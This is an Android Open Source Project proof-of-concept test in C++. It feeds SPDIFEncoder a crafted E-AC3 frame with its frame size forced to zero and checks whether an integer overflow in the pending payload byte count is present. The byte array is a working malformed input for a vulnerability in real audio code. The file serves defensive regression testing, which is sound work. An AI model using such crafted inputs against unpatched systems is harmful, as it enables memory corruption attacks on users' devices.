1 /**
2  * Copyright (C) 2022 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #include <stdlib.h>
18 #include <audio_utils/spdif/SPDIFEncoder.h>
19 #include "../includes/common.h"
20 
21 // Taken as a reference from audio_utils/tests/spdif_tests.cpp "MySPDIFEncoder"
22 class PocSPDIFEncoder : public android::SPDIFEncoder {
23  public:
24 
PocSPDIFEncoder(audio_format_t format)25     explicit PocSPDIFEncoder(audio_format_t format)
26             : SPDIFEncoder(format) {
27     }
28 
29     PocSPDIFEncoder() = default;
30 
getBurstBufferSizeBytes() const31     size_t getBurstBufferSizeBytes() const {
32         return mBurstBufferSizeBytes;
33     }
34 
getByteCursor() const35     size_t getByteCursor() const {
36         return mByteCursor;
37     }
38 
getFramer() const39     android::FrameScanner *getFramer() const {
40         return mFramer;
41     }
42 
getPayloadBytesPending() const43     size_t getPayloadBytesPending() const {
44         return mPayloadBytesPending;
45     }
46 
writeOutput(const void *,size_t numBytes)47     ssize_t writeOutput(const void*, size_t numBytes) override {
48         mOutputSizeBytes = numBytes;
49         return numBytes;
50     }
51 
52     size_t mOutputSizeBytes = 0;
53 };
54 
main()55 int main() {
56     PocSPDIFEncoder encoder(AUDIO_FORMAT_E_AC3);
57 
58     // Beginning of the file channelcheck_48k6ch.eac3 with frame size
59     // forced to zero
60     uint8_t buf[] = { 0x0B, 0x77, 0x00, 0x00, 0x3F, 0x85, 0x7F, 0xE8, 0x1E,
61             0x40, 0x82, 0x10, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03,
62             0xFC, 0x60, 0x80, 0x7E, 0x59, 0x00, 0xFC, 0xF3, 0xCF, 0x01, 0xF9,
63             0xE7 };
64     encoder.write(buf, sizeof(buf));
65 
66     size_t bufferSize = encoder.getBurstBufferSizeBytes();
67 
68     // If vulnerability is present, 'mPayloadBytesPending' will be assigned
69     // a large overflowed value
70     size_t pendingBytes = encoder.getPayloadBytesPending();
71 
72     // 'mBurstBufferSizeBytes' shouldn't be lesser than 'mPayloadBytesPending',
73     // this will happen if 'mPayloadBytesPending' holds a overflowed value
74     return (bufferSize < pendingBytes) ? EXIT_VULNERABLE : EXIT_SUCCESS;
75 }
76